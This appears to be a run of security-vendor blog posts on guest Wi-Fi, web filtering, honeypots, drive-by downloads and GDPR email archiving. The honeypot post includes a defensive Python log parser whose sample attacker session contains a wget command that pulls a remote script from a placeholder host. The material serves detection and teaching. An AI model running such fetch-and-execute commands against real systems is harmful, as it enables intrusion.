There are many benefits to be gained from setting up a wireless guest network, but doing so introduces risks. If those risks are not managed, guest users could gain access to network resources and view or steal sensitive information. Malware may be accidentally or deliberately installed, and vulnerabilities could be introduced that could expose the network to hackers. Fortunately, following some simple wireless guest network best practices will help you secure the WiFi network, mitigate risks, and make your wireless network as secure as, or more secure than, your wired network.
Separate your wireless guest network from the business network – Set up a second SSID specifically for guests to use. It should not be possible for guest users to access your internal WiFi network.
Choose the SSID wisely – Choose a name that does not advertise the fact that the network belongs to your business if you want to make it harder for hackers to attack your WiFi network.
Set a secure password for guests to use – Make sure the default password is changed to ensure only authorized guests can access the network.
If possible, ensure each guest user can be identified on the network. Use a management solution that collects guest credentials as this will allow you to monitor guest behavior and gain valuable insights into how your customers are using the network. Be aware there are restrictions under GDPR and CCPA that require you to obtain consent to collect personal data and explain why the data is being collected.
Communicate your Internet usage policies to guests so they know what is allowed and prohibited while connected to your WiFi network.
Use the most advanced encryption available – All modern routers and access points support WPA2 encryption. Make sure this is enabled, or WPA3 if it is supported. Avoid using WPS, as it is vulnerable to brute-force attempts to guess the password.
Disable administrative access from the wireless network – If a hacker succeeds in gaining access to your WiFi network, not being able to reach the router or access point’s admin interface from that network limits the harm that can be caused.
Implement a web filtering solution – A web filter should be configured to prevent users from accessing inappropriate and malicious websites while connected to the WiFi network.
WebTitan Cloud for WiFi – Secure Guest WiFi for Business Users
TitanHQ has made it easy to secure guest WiFi for business users. WebTitan Cloud for WiFi is a 100% cloud-based web filter that allows businesses to carefully control the categories of web content that can be accessed by guest users.
WebTitan Cloud for WiFi allows businesses to block access to 53 different predefined categories of web content, including pornography, gambling, dating, news, and social media websites. Within those 53 categories are more than 500 million websites in 200 languages that have been assessed for content and categorized. A cloud-based lookup also ensures accurate and flexible filtering based on page content.
Secure guest WiFi for business means effective malware, ransomware, and phishing protection. With WebTitan Cloud for WiFi deployed, access to compromised websites, phishing sites, and other malicious websites will be blocked.
Flexible policy creation means control over the filter can be delegated to different departments, and controls can be applied for different types of users. Cloud Keys can also be created to allow specific users to bypass policy rules.
A full suite of reports ensures detailed information is always available, with email notifications alerting administrators to attempted policy violations and a real-time browsing view is available.
If you want to take control of your WiFi network or are an MSP looking for an easy-to-use multi-tenant solution to allow you to provide a web filtering service to your clients, WebTitan Cloud for WiFi is a quick, easy to use, and low-cost way of providing secure guest WiFi for business users.
Contact TitanHQ today for further information on WiFi guest network security and to find out how WebTitan can protect your business. Our knowledgeable sales staff will be able to advise you on the best way to improve guest WiFi security and will help you choose the best deployment option. If you want to see WebTitan in action before you make a purchase decision, our sales staff will be happy to schedule a product demonstration and help set up a free trial of the solution.
Guest Wi-Fi Security FAQs
How can I improve guest Wi-Fi security?
You must ensure your guest Wi-Fi network is properly configured. You should set a password for access, ensure traffic is encrypted to prevent interception by selecting WPA2 or WPA3 on the router, ensure guest users cannot access and change the router settings, and you should use a content filtering solution to prevent malware downloads and restrict access to inappropriate website content.
What content can I block on guest Wi-Fi networks?
You have full control over the content that guests can access via your Wi-Fi network. With WebTitan Cloud for Wi-Fi, you can block content using 53 pre-defined categories and can create up to 10 categories of your own using your own keywords. Access to specific websites can be allowed or blocked using whitelists and blacklists. All known malicious websites will be automatically blocked.
Can I see what websites guest users are accessing?
A web filtering solution gives you full visibility into the web content that your employees and guest users are viewing, including providing real-time views of Internet access. This information can give you valuable insights into customer behavior which can guide your marketing efforts. You can also run reports to find out the URLs that users have attempted to visit but were blocked by the web filter.
Will a cloud-based web filter for guest Wi-Fi work on all devices?
There is no software to download onto devices and no restrictions on the devices that can connect to your secure Wi-Fi network. WebTitan Cloud for Wi-Fi works with all operating systems and all devices and allows businesses to offer clean, filtered Internet access for customers on Wi-Fi access points. If required, different filtering controls can be set up for different user groups.
Is SSL inspection necessary?
If you have a web filter that does not have SSL inspection, traffic to and from HTTPS websites will be invisible to the filtering solution. That means files downloaded from HTTPS websites cannot be scanned by the AV engines of the web filter. Since many malicious websites have SSL certificates, a web filter with SSL inspection is essential.
There are many reasons why businesses want to restrict internet access at work. Allowing employees to have unrestricted access to the internet can result in a major drain on productivity. Unfettered internet access can also increase the risk of malware and ransomware downloads, while inappropriate internet access at work can lead to a range of legal issues. Due to the risks involved, it is unsurprising that many firms choose to use a technological solution to enforce acceptable Internet usage policies and block access to malicious websites. This post explores some of the key benefits that come from using a web filter to limit internet access in the workplace and some of the potential problems that can be caused by using content-control software.
The Problem of Personal Internet Use at Work
It is inevitable that employees will slack off from time to time regardless of whether they have access to the internet, but internet access makes slacking off much easier. Simply placing restrictions on the websites that can be accessed will not eradicate time-wasting, but it can allow businesses to make significant gains in productivity. Some employees spend a considerable percentage of the working day on personal internet use, playing online games, or accessing their social media accounts. If every employee in an organization were to spend an hour a day on personal internet use, the productivity losses would be considerable. A company with 100 employees would lose 100 hours a day, a loss of 26,100 working hours a year, and many employees spend much longer each day on personal internet use.
There are other issues that can result from excessive personal internet use at work. When employees use streaming services, download files via P2P networks, or engage in other bandwidth-heavy activities, it will naturally have an impact on internet speeds across the entire organization. Using a web filter to restrict internet access at work and limiting access to certain bandwidth draining activities allows businesses to ensure sufficient bandwidth is available for all employees.
The Danger of Malware and Ransomware Downloads
If employees are accessing social media websites, downloading files, or are visiting questionable websites, the risk of malware or ransomware downloads increases significantly.
Exploit kits probe for vulnerabilities in browsers and plugins, which are then exploited to silently download malware. Traffic is usually directed to these websites through malicious adverts – termed malvertising – although high-traffic websites are constantly being compromised by hackers who add malicious content such as phishing webpages and malware.
Certain types of websites carry a high risk of resulting in malware infections. Allowing employees to access these sites, many of which are not suitable for work, could easily result in a malware or ransomware download.
The operators of legitimate pornographic websites usually take great care to ensure their sites are not compromised or infected with malware. They are, after all, legitimate businesses. However, pornographic content is often used as a lure to spread malware and there are many disreputable adult sites whose purpose is solely to infect visitors with malware or harvest credit card information. Blocking these NSFW sites not only helps to improve productivity and avoid legal issues, but it also reduces the risk of malware infections.
One of the riskiest online activities is the use of torrent sites and P2P file-sharing networks. There are few, if any, controls over the content that is shared via torrent sites, and pirated music and video files are often seeded with malware, spyware, and adware. Illegal software downloads are incredibly risky, as malware is often bundled in the executable files used to install the software or in the accompanying keygen tools that generate product keys to allow the software to be used.
A malware or ransomware attack can prove incredibly costly. Many companies have experienced ransomware attacks that have resulted in systems being taken out of action for several days or even weeks, causing massive losses as the business grinds to a halt. A ransomware attack can result in an entire network being taken out of action, as was the case with the WannaCry attacks in 2017. The NHS in the UK suffered major disruption as a result of the installation of the malware and mitigating the attacks cost £92 million. The NotPetya wiper malware campaign conducted soon after caused widespread damage. The shipping firm Maersk had its systems infected and the clean-up bill has been estimated to be $300 million.
A web filter will not prevent all malware and ransomware attacks, but it can stop employees from visiting certain categories of ‘risky’ websites, it can be configured to block the downloading of certain file types, and it can block websites known to contain malware or exploit kits. Any attempt to visit one of those websites will direct the user to a block screen. Many businesses decide to restrict internet access at work primarily to protect against malware and ransomware downloads.
Additional Protection Against Phishing Attacks
Phishing is the number one cyber threat faced by businesses. It has been estimated that more than 90% of cyberattacks start with a phishing email. One of the best protections against phishing is a spam filtering solution, which will prevent the majority of malicious messages from being delivered to end users. However, no spam filter is 100% effective and some malicious messages will end up in employees’ inboxes. Employees can be trained how to identify phishing emails and be taught cybersecurity best practices that will reduce susceptibility to phishing attacks, but sooner or later an employee will likely be fooled into clicking a link in an email and will arrive at a phishing website.
When a user is directed to a website and discloses their login credentials, an attacker can gain access to their email account and all the sensitive data contained in that account. The compromised account can also be used to send further phishing emails to other employees in the organization or to customers and business contacts. It is common for a single response to a phishing email to result in several email accounts being compromised.
Phishing attacks are some of the costliest cyberattacks to resolve. Each email in a compromised account must be checked for personally identifiable information and other sensitive data. Manually checking thousands of emails can take weeks and can cost hundreds of thousands of dollars.
A web filter is an additional layer of security that helps organizations improve their defenses against phishing by providing time-of-click protection and blocking attempts to visit malicious websites. When an employee clicks a link to a website that has been added to a blacklist due to past use in phishing campaigns, the user will be directed to a block screen. TitanHQ’s web filtering solution, WebTitan, blocks attempts to access around 60 million malicious websites a week.
Preventing Inappropriate Web Content from Being Accessed
While most employees do not use the internet to access illegal and not-suitable-for-work content, there are always a few bad apples. The problem of accessing pornography at work is a real issue, and could be much worse than you think.
In 2014, a survey conducted by the Barna Group showed 63% of men and 36% of women have viewed pornography at work. A survey in Forbes in 2013 revealed 25% of adults have viewed porn at work, while in another survey, 28% of employees admitted to downloading porn at work. Not only is the accessing of pornography at work a major drain of productivity, but it can also lead to the development of a hostile working environment. Pornography can be used to harass and degrade employees, especially women. There have been cases of employees taking legal action against their employers over the failure to implement content controls in the workplace and prevent pornography from being accessed by coworkers.
Many businesses feel the best way to tackle the problem of pornography access in the workplace is through acceptable usage policies and greater oversight of employees by line managers. When individuals are discovered to be abusing the internet, action can be taken against individuals without having to restrict internet access at work for everyone. This does not always prove effective. Further, when pornography use at work is discovered, employees usually face instant dismissal. That carries a cost to the HR department and productivity losses while new employees are hired and trained.
The easiest solution is to use a web filter to restrict internet access at work. A web filter can be used to block access to specific websites or categories of website content such as pornographic sites and enforce acceptable usage policies. This is one of the most common reasons why businesses restrict internet access at work.
Problems with Using a Web Filter to Restrict Internet Access at Work
A web filter may seem like a quick and easy solution to the above issues, but it should be noted that companies that restrict internet access at work with web filters can encounter problems. If you restrict internet access at work using an appliance-based web filtering solution, it can result in latency. Each website must be inspected before it is accessed, which delays the loading of websites. In the case of secure (HTTPS) sites, each webpage must be decrypted, inspected, and re-encrypted. This places a considerable strain on resources. As more sites switch to HTTPS, the problem of latency becomes a real issue.
The solution is to use a DNS-based filtering solution. With DNS filtering, the decision to allow or block a site is made when its domain name is resolved, all filtering occurs in the cloud, and there is no latency. There are other benefits too. Cloud-based web filters are more flexible and scalable, and they do not require the purchase of any hardware, which results in considerable cost savings.
When web filters are used to restrict internet access at work and they lack highly granular controls, there can be issues with the overblocking of website content. Websites that need to be accessed for work purposes may be blocked, which requires the IT support team to spend time whitelisting websites. The solution is to choose a web filter with highly granular controls, which allows content to be easily blocked without also blocking websites that need to be accessed for work purposes.
Should Companies Restrict Internet Access?
While content control software may seem like an ideal way of preventing employees from cyberslacking to make productivity gains, care must be taken when applying those controls otherwise the productivity gains may not be realized. If you restrict internet access at work, employees who were only accessing the occasional personal site may be unhappy with the new restrictions. This can have a negative effect on productivity and create a hostile working environment. Why should all employees be made to suffer because of the actions of a few? Care must therefore be taken when deciding what types of websites to block. With careful and intelligent control, you can make productivity gains and can avoid any staff issues.
How to Control Internet Usage in Office and Avoid Staff Problems
One of the easiest ways to improve productivity while applying controls over internet access is to use a web filtering solution that allows time-based filtering controls to be applied. Employers can use this feature to restrict internet access at work during busy times and relax controls at others. It is easy to block access to certain sites 100% of the time and others only some of the time. With WebTitan, administrators can set standard controls during busy times such as mornings, and relax controls during breaks or outside of office hours.
How Can I Block Internet Access on an Employee’s Computer?
There are several ways to block internet access on an employee’s computer. If you want to block internet access totally for a specific employee, be that a temporary or permanent block, you can use your existing network hardware or a firewall rule to block a specific IP address.
A web filter allows much more granular controls to be applied, such as blocking specific websites or categories of websites for a specific employee or group of employees. This option is much easier and less time-consuming if you need to block internet access – or implement partial blocks – for more than one employee. With a cloud-based web filter, these controls can be applied quickly and easily through a web portal that can be accessed by the administrator from any computer.
How to Limit Employee Internet Access Selectively
Many businesses want to know how to restrict internet access for employees without totally blocking access to the internet. With WebTitan it is easy to limit employee internet access selectively. Different controls can be set for different employees or groups of employees. If you have sales staff, you may want to do as much as possible to make sure they are always on the phone, and internet controls may need to be more restrictive. The marketing department may require much more lax controls since they will be required to access a broader range of websites for work. Since the filter integrates with LDAP and Active Directory, setting controls for different users and user groups is simple. You can implement organization-wide controls (e.g. adult content), department controls (social media), and individual controls through LDAP/AD.
Speak to TitanHQ About Controlling Internet Access In the Workplace
Internet content control is quick, easy, and cost-effective with WebTitan. The solution allows you to easily restrict internet access at work and avoid problems associated with web filtering. If you are interested in curbing personal internet use at work and improving your organization’s security posture, contact TitanHQ today for advice. You can also sign up for a free trial and evaluate WebTitan in your own environment before you commit to a purchase and can schedule a product demonstration to see WebTitan in action.
FAQs about Restricting Internet Access at Work
Should I set up a guest Wi-Fi network?
Guest Wi-Fi networks allow visitors to access the Internet through the same equipment as your employees but will ensure that both networks are separated. If a guest user’s device is infected with malware, it will not spread to your primary business network. Guest users will also not be able to access any internal resources or data.
What are the most important guest Wi-Fi security best practices?
Ensure a password is set for the guest network. Make sure that traffic is encrypted using Wi-Fi Protected Access (WPA or WPA2) to prevent data interception. Control the content that can be accessed using a web filter for your Wi-Fi network, and monitor what your guest network is being used for.
What is the cost of a content filter for a Wi-Fi network?
Content filtering for Wi-Fi networks is not expensive considering the protection it provides. Some solutions will cost around $2.50 per user, per month. These tend to be aimed at large enterprises with complex needs. For most businesses, you can get the protection you need for around $1 per user, per month.
Does a web filter work for HTTPS websites?
A web filter will block access to all websites in blacklists, which includes HTTPS websites known to be malicious. A web filter with SSL inspection will decrypt, inspect, then re-encrypt HTTPS sites in real-time and will block access to those sites if they violate user-defined policies.
Is Internet content filtering difficult?
Internet content filtering need not be complicated. With a cloud-based web filter you just make a simple change to point your DNS to your service provider. Log in to your web-based user interface and use the checkboxes to select the content you want to permit or block. All malicious websites will automatically be blocked through the blacklists used by the solution.
For the second year in a row, TitanHQ has collected best-in-category awards from Expert Insights for each of its three products: SpamTitan Email Security, WebTitan Web Security, and ArcTitan Email Archiving.
SpamTitan was recognized and awarded top spot in the Best Email Security Gateway and Best Email Security Solution for Office 365 categories, the DNS-based web filtering solution WebTitan Cloud came top in the Best Web Security Solution category, and the cloud-based email archiving solution, ArcTitan, placed top in the Best Email Archiving Solution for Business category.
The cybersecurity solutions were praised for the level of protection they provided against threats such as malware, ransomware, phishing, viruses, and botnets, with all three solutions recognized for ease-of-use and cost-effectiveness. TitanHQ’s world-class technical and customer support also proved to be a hit with Expert Insights’ researchers and businesses that have adopted the solutions.
Expert Insights is an online publication covering cybersecurity and cloud-based technologies that is used by over 80,000 business leaders, IT professionals and others to obtain invaluable advice to help them make the right purchase decisions. The publication includes insights into B2B products and services, with the UK and US-based teams conducting interviews, industry analyses, and technical product reviews.
Each year, the Fall 2021 Best-of Cybersecurity Awards recognize the leading companies and products for businesses and managed service providers, with the category winners selected based on reviews by independent technical analysts, the Expert Insights’ editorial team, and feedback from users of the solutions.
To win one award is a great achievement, but to win 4 shows the commitment of the TitanHQ team to providing businesses with powerful solutions that address their needs that are easy to use and at the right price point, providing timely help and advice for customers whenever it is required.
“TitanHQ are proud to have received continued recognition for all three of our advanced cybersecurity solutions. As the threat landscape continues to be a significant risk to organizations across the globe, we are dedicated to continuous innovation to provide consistent, secure, and reliable protection to our customers,” said Ronan Kavanagh, TitanHQ CEO.
There are many benefits of honeypots, most notably, they can significantly improve your security posture. As such, all organizations should consider implementing a honeypot, but be sure to assess the disadvantages as well as the advantages as you may decide they are not worth the time and effort.
This post covers the pros and cons of honeypots to help you decide whether a honeypot is appropriate for your organization.
What is a honeypot and why are they used?
A honeypot is an additional security protection that can be used alongside a firewall and other security solutions to help protect a network from hackers.
Honeypots, as the name suggests, are designed to catch a hacker’s eye so that their efforts will be drawn to attacking the honeypot rather than a system where they could cause serious harm.
They appear to be an easy entry point into a network to distract attackers from looking at other parts of the system. They are a deliberate hole in the security of the system that can be attacked without causing harm. They allow IT teams to gather valuable intelligence on hackers who are attempting to gain access to their networks.
In contrast to a firewall, which is designed only to keep external attackers out, a honeypot can also identify internal threats and attacks. Many companies are almost blind to attacks from within. A honeypot provides increased visibility and allows IT security teams to defend against attacks that the firewall fails to prevent. There are considerable benefits of honeypots, and many organizations have implemented them as an additional protection against internal and external attacks.
There are many benefits of honeypots!
A honeypot is a system that is set up with the singular purpose of being attacked. It is a system designed to be exploited, hacked, infected with malware, and generally abused by a malicious third party. Why should I do that, you may ask? Well, there are many benefits of honeypots.
You may wonder why you should spend your time, effort, and money setting up a system that will attract hackers. Why should you deliberately create a system with weakened defenses that will be exploited? Why attract interest from malicious third parties at all?
There are three very good reasons why you should. First, you will be wasting a hacker’s time, and time spent attacking a system that is safe is time not spent hacking a system that will damage your organization if the hacker succeeds.
Secondly, by setting up a honeypot you will be able to see who is attacking you and the methods that are being used. This will give you a very good idea of the types of attacks being used and the defenses you will need to install to protect your real systems and data from attack.
Thirdly, an attack on a honeypot is likely to frustrate a hacker and stop them from hacking your real computer systems.
Security researchers are well aware of the benefits of honeypots. They have been vital in the study of hackers’ behavior. They can be used to determine how systems are attacked and are also a very useful part of system defenses. It is not a question of whether you should set up a honeypot, but rather why you have not already done so.
There are many different types of honeypot that can be implemented. You can set up a dummy system with an entire network topology if you wish. You can have many different hosts, you can include a wide range of services and even different operating systems. In short, an entire system can be set up to appear genuine and allow an attack to take place.
There are many different types of honeypot that can be deployed, although for the purpose of this article we have provided further information on two popular honeypots below: Honeyd and Kippo.
The Honeyd honeypot
This is a small daemon that can be used to create a network containing many virtual hosts. Each of those hosts can be set up and configured differently. You can run a range of arbitrary services on each, and configure them to appear as if they are running different operating systems. For network simulation purposes, you can create tens of thousands of different hosts on your LAN using Honeyd if you so wish. You can use Honeyd to hide your real system, identify threats, assess risk, and improve your security posture.
Simulate multiple virtual hosts simultaneously
Identify cyberattacks and assign hackers a passive-fingerprint
Simulate numerous TCP/IP stacks
Simulate network topologies
Set up real FTP and HTTP servers, and even UNIX applications under virtual IP addresses
The lowdown on Honeyd
We invited a guest sys admin (Arona Ndiaye) to provide input on the Honeyd honeypot to get the perspective of a Linux administrator. She mainly uses Linux and *nix systems and has tried out Honeyd to get an idea of how it works, what it can do, and its functionality. She installed it on Kali Linux, which was a simple process requiring a single line to be added to the sources.list file, then running apt-get update && apt-get install honeyd.
A few tweaks were needed to ensure the firewall had the correct permissions set, along with some simple text editing in a configuration file. That was all that was needed. If any problems are encountered, or more detailed information is required, it is all available on the honeyd website. Most people find the easiest way to get started is to play with the system and to try to attack it, which is what she did.
She was particularly impressed with the information that can be gathered on attacks and scans. The methods of attack were recorded in intricate detail, including how it was possible for hackers to fool NMAP. The overall verdict was “seriously impressive.”
The Kippo honeypot
We also put Kippo, another popular honeypot, to the test. Kippo is used to create a dummy SSH server, which allows attackers to conduct brute force attacks. The honeypot can be set with a root password that is particularly easy to guess, such as a simple string of numbers: 123456 for example.
Set up the honeypot with an entire file system, or even better, clone a real system for added realism. The aim is to convince the hacker that he or she is attacking a real system. Once the attacker has successfully managed to log in to the system, everything they subsequently do will be recorded. All actions will be logged, so it is possible to see exactly what happens when a system is attacked.
What is particularly good about Kippo is how detailed the fake system can be. You can really waste a considerable amount of a hacker’s time and get an accurate picture of exactly what they are trying to achieve, the files they upload and download, what malware and exploits they install, and where they put them. You can then use a virtual machine to analyze the attack in detail when you have the time.
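Because nothing legitimate ever logs in to a honeypot, the records Kippo keeps can be turned straight into alerts. The following is an added example (not Kippo's own code) that summarizes brute-force attempts, the credentials that eventually worked, and the commands typed afterwards; the log lines are constructed and only modelled on Kippo's text log, so treat the exact format as an assumption and adjust the regular expressions to your installation's output.

```python
"""Summarize attacker sessions from Kippo-style SSH honeypot logs (added example)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample log lines (TEST-NET addresses, nothing real). The layout is an
# assumption modelled on the text log Kippo writes; adapt the regexes if yours differs.
SAMPLE_LOG = """\
2021-11-02 09:14:01+0000 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 203.0.113.7:51232 (10.0.0.5:2222) [session: 1]
2021-11-02 09:14:03+0000 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.7] login attempt [root/toor] failed
2021-11-02 09:14:04+0000 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.7] login attempt [root/password] failed
2021-11-02 09:14:05+0000 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.7] login attempt [root/123456] succeeded
2021-11-02 09:14:09+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,203.0.113.7] CMD: uname -a
2021-11-02 09:14:12+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,203.0.113.7] CMD: wget http://198.51.100.9/x.sh
2021-11-02 09:15:30+0000 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 198.51.100.23:40010 (10.0.0.5:2222) [session: 2]
2021-11-02 09:15:31+0000 [SSHService ssh-userauth on HoneyPotTransport,2,198.51.100.23] login attempt [admin/admin] failed
2021-11-02 09:15:32+0000 [SSHService ssh-userauth on HoneyPotTransport,2,198.51.100.23] login attempt [admin/1234] failed
"""

# One line per authentication attempt: session id, source IP, credentials tried, outcome.
LOGIN_RE = re.compile(
    r"\[SSHService ssh-userauth on HoneyPotTransport,(?P<sid>\d+),(?P<ip>[\d.]+)\] "
    r"login attempt \[(?P<user>[^/\]]*)/(?P<pw>[^\]]*)\] (?P<result>succeeded|failed)$"
)
# One line per shell command typed inside the fake system after a successful login.
CMD_RE = re.compile(r"on HoneyPotTransport,(?P<sid>\d+),(?P<ip>[\d.]+)\] CMD: (?P<cmd>.*)$")


@dataclass
class Session:
    source_ip: str
    failed: int = 0
    success: Optional[Tuple[str, str]] = None   # (user, password) that was accepted
    commands: List[str] = field(default_factory=list)


def summarize(log_text: str) -> Dict[int, Session]:
    """Group login attempts and subsequent commands by Kippo session id."""
    sessions: Dict[int, Session] = {}
    for line in log_text.splitlines():
        m = LOGIN_RE.search(line)
        if m:
            s = sessions.setdefault(int(m["sid"]), Session(m["ip"]))
            if m["result"] == "succeeded":
                s.success = (m["user"], m["pw"])
            else:
                s.failed += 1
            continue
        m = CMD_RE.search(line)
        if m:
            s = sessions.setdefault(int(m["sid"]), Session(m["ip"]))
            s.commands.append(m["cmd"])
    return sessions


def alerts(sessions: Dict[int, Session], brute_force_threshold: int = 5) -> List[Tuple[int, str, str]]:
    """Return (session id, source ip, kind) tuples worth paging on.

    A honeypot has no legitimate users, so every accepted login is an incident, and
    repeated failures from one session are a password-guessing run in progress.
    """
    found: List[Tuple[int, str, str]] = []
    for sid in sorted(sessions):
        s = sessions[sid]
        if s.failed >= brute_force_threshold:
            found.append((sid, s.source_ip, "brute_force"))
        if s.success is not None:
            found.append((sid, s.source_ip, "login_succeeded"))
    return found


if __name__ == "__main__":
    sessions = summarize(SAMPLE_LOG)
    for sid, s in sorted(sessions.items()):
        print(f"session {sid} from {s.source_ip}: {s.failed} failed, "
              f"accepted={s.success}, commands={s.commands}")
    for alert in alerts(sessions, brute_force_threshold=2):
        print("ALERT", alert)
```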
Set up combo-honeypots to create a highly elaborate network
Both Kippo and Honeyd are open source, so it is possible to tweak both honeypots to suit your own needs and requirements. You can even combine the two to build up extremely elaborate networks – specifying specific file contents and creating fake systems that appear perfectly real. How much time you spend doing this, and the level of detail you want to add is up to you. If you really want to find out exactly how the systems are attacked to better prepare your real system, these are exceptionally good tools to use.
Adding a honeypot can help to improve your security, but simply setting one up will not. Unfortunately, to gain the benefits of honeypots you will need to invest some time in setting up a realistic network and it will need to be updated and maintained. It must be treated like any other machine or system you use in order for it to be effective. You must also make sure that it is isolated or insulated. Creating a fake system that is easy to attack shouldn’t give a hacker an easy entry point into your real system!
Summary: Main Benefits of Honeypots
Listed below are the main benefits of honeypots:
Observe hackers in action and learn about their behavior
Gather intelligence on attack vectors, malware, and exploits. Use that intel to train your IT staff
Create profiles of hackers who are trying to gain access to your systems
Improve your security posture
Waste hackers’ time and resources
They show you that you are being attacked, and that data is valuable when attempting to get budget increases for security.
Disadvantages of Honeypots
We have covered the benefits of honeypots, but are there any disadvantages of honeypots apart from the time taken to set them up?
No system is perfect and there are notable disadvantages of honeypots. One of the main problems is that the system is designed to be attacked, so attacks will likely take place. Once the honeypot is accessed it could be used as a launchpad for further attacks. Those attacks could be conducted on an internal system or on another company. Honeypots therefore introduce risk, and with it an issue of legal liability. If your honeypot is used in an attack on another business, you could be sued. The level of risk that it introduces will depend on the honeypot. Typically, the more complex the honeypot, the greater the risk is likely to be.
Then there is the question of the resources you will need to set up the system. If you want to create a realistic system that will fool hackers, it needs to look and behave like the real system it is designed to mimic. There are free options available that will make it more cost-effective to set up a honeypot, although they still require resources. The hardware comes at a cost and they require maintenance and monitoring. The cost may be prohibitively expensive for some businesses.
That said, maintenance need not be a major drain of time. In many cases, honeypots can be set up and left. Since there is no expected production activity, monitoring the honeypot and assessing activity will require minimal effort. Automatic alerts are generated when an attack is in progress and any data generated will likely be a real attack. Honeypots may be set up on existing old hardware that would otherwise not be used. In such cases, costs can be kept to a minimum.
Honeypots add complexity to a network, and the more complex a network is, the harder it is to secure. The honeypot could introduce vulnerabilities that could be exploited to gain access to real systems and data.
Finally, the honeypot can only tell you about an attack in progress if the honeypot is directly attacked. If an attack involves other systems and the honeypot is untouched – for instance, if the honeypot was identified as such by the attacker and avoided – it would be necessary to rely on other mechanisms to identify the attack.
Whether the benefits of honeypots outweigh the disadvantages will depend on the nature of your business, how probable it is that attempts will be made to attack your network, and the resources you have available for IT security. Your money could be better spent on other security solutions and your IT team’s time may be better directed to monitoring other systems and addressing vulnerabilities and patching software.
In addition to installing a spam filter to block malware delivery via email, it is important to implement a solution to block drive-by malware downloads. A drive-by malware download is a web-based attack where malware is installed onto a victim’s device.
Drive-by malware download attacks are those where malicious programs are downloaded and installed on a device without user consent. The malware may be relatively harmless adware that shows ads to generate income for the developer, spyware that gathers information about a user, or more dangerous malware variants such as keyloggers and banking Trojans that harvest credentials, or even ransomware that encrypts files to extort money from the victim.
Drive-by malware downloads can occur silently, without the user being aware anything untoward has happened by tricking them into visiting a malicious website. That could involve a phishing email with a hyperlink that bypasses an email security solution, occur via a redirect from a compromised website, or by clicking a malicious advert online.
Malicious websites can be encountered simply through normal web browsing and drive-by malware downloads can even occur via legitimate websites. Many websites have third-party ad blocks that generate additional revenue for the website owner. Malicious adverts – termed malvertising – may sneak past the checks performed by third-party ad networks and be displayed to site visitors. If a link is clicked, the user is directed to a malicious website. Threat actors also engage in search engine poisoning, where search engine optimization techniques are used to get malicious websites appearing high up in the search engine listings.
These downloads may occur silently, or individuals may be tricked into downloading malicious software or apps that they believe to be genuine. They install the software and are unaware that malware has also been installed. This week, an alert was issued about a campaign involving a fake .msi installer which is being used to deliver an information stealing malware variant called Jupyter that has been extensively used in attacks on the healthcare and education sectors.
It is important for businesses to protect against drive-by malware downloads, and one of the best ways to do this is by using a web filtering solution. A web filter, as the name suggests, is used to filter out undesirable website content. The consumer versions include parental control solutions on home WiFi networks. Just as you would want to prevent your children from accessing potentially harmful age-inappropriate web content, a web filter is used by businesses to prevent harmful content from being accessed by employees.
WebTitan from TitanHQ is used by businesses, managed services providers, and Internet service providers to block access to malicious, illegal, and other undesirable web content such as pornography and protects against drive-by malware downloads in several ways.
First, it is possible to prevent downloads of certain file types from the Internet – the file types commonly associated with malware (.exe, .js, and .msi for example). Another control to prevent malware downloads is the use of blacklists of IP addresses and domains that have previously been identified as being used for malware distribution. The solution can also be configured to block access to risky website categories that are often used for malware distribution, such as peer-to-peer file sharing networks.
WebTitan is quick and easy to implement and configure, has no impact on page load speeds, can protect any number of users including on-site and remote workers, and the solution is automatically updated with the latest threat intelligence to block malicious content as soon as it is detected.
If you want to block drive-by malware downloads, improve protection against phishing attacks, and carefully control the web content that can be accessed via your wired and wireless networks, contact TitanHQ today for more information about WebTitan. Product demonstrations can be arranged on request, and you can take advantage of a free 14-day trial of the solution.
In this post, we will explain how the GDPR applies to email retention and email archiving, and how an email archive can help you comply with the GDPR.
The EU’s General Data Protection Regulation (GDPR) introduced new requirements for businesses on May 25, 2018. From the compliance date, businesses that collect or process the personal data of EU citizens were required to implement safeguards to protect the personal data of EU citizens. The GDPR also gave EU citizens new rights over their personal data.
The GDPR applies to personal data in all forms, no matter where data are stored. That means personal data in email accounts is covered by the GDPR. Email inboxes and folders can contain a wealth of personal data and that information is subject to the strict privacy and security requirements of the GDPR.
Email data may also need to be retained to comply with laws in the country or state in which your business operates, and certain industries such as finance and healthcare have industry-specific legislation with provisions covering email retention.
There is no minimum or maximum time stipulated for email retention in the GDPR, instead, the GDPR states that personal data can be kept in a form that allows an individual to be identified for no longer than necessary to achieve the purpose for which personal data were collected or processed. The GDPR allows personal data to be processed for archiving purposes.
The GDPR requires businesses to implement security measures to ensure personal data are protected. Article 5(f) of the GDPR requires personal data to be protected “against accidental loss, destruction or damage, using appropriate technical or organizational measures.” The easiest way to ensure email data are protected is by using encryption and storing emails in a safe and secure environment where they are protected against unauthorized access, accidental deletion, and tampering – an email archive.
It is worthwhile explaining the difference between an email archive and a backup, as while both can be used to store emails there are important differences between the two. A backup is a temporary repository for email data that ensures emails can be recovered in the event of data loss. Backups are usually only kept for a limited amount of time, usually until a new backup is created. A backup allows the mail system or data in an email account to be restored to a specific point in time. An email archive is used for long-term secure email storage and, in contrast to a backup, it can be searched and individual emails can be quickly found and retrieved.
Many businesses already use an email archiving solution to comply with state, federal, or industry regulations. An email archive is also invaluable for eDiscovery and dealing with customer complaints, as it can be searched and emails can be quickly and easily retrieved on demand. An email archive can also be used to recover email data in the event of a disaster, so it also protects against data loss.
An email archiving solution is important for GDPR compliance as it allows email data to be stored safely to prevent data loss and unauthorized access. Personal data in emails can also be quickly found, recovered, and deleted securely, if an EU citizen exercises their right to be forgotten, for instance.
ArcTitan, TitanHQ’s secure email archiving solution, is an ideal email archiving solution for GDPR compliance. ArcTitan includes end-to-end encryption for email data, access controls – including role-based controls – to ensure email data are protected against unauthorized access, and ArcTitan creates a tamper-proof record of all email data for the duration of your email data retention policy.
If emails need to be found, the archive can be searched and messages can be quickly and easily retrieved. With ArcTitan, you can search 30 million emails a second. Multiple searches can be performed simultaneously, searches can be combined and, in contrast to Office 365 archiving, the same search can be used to find data in the message body and attachments.
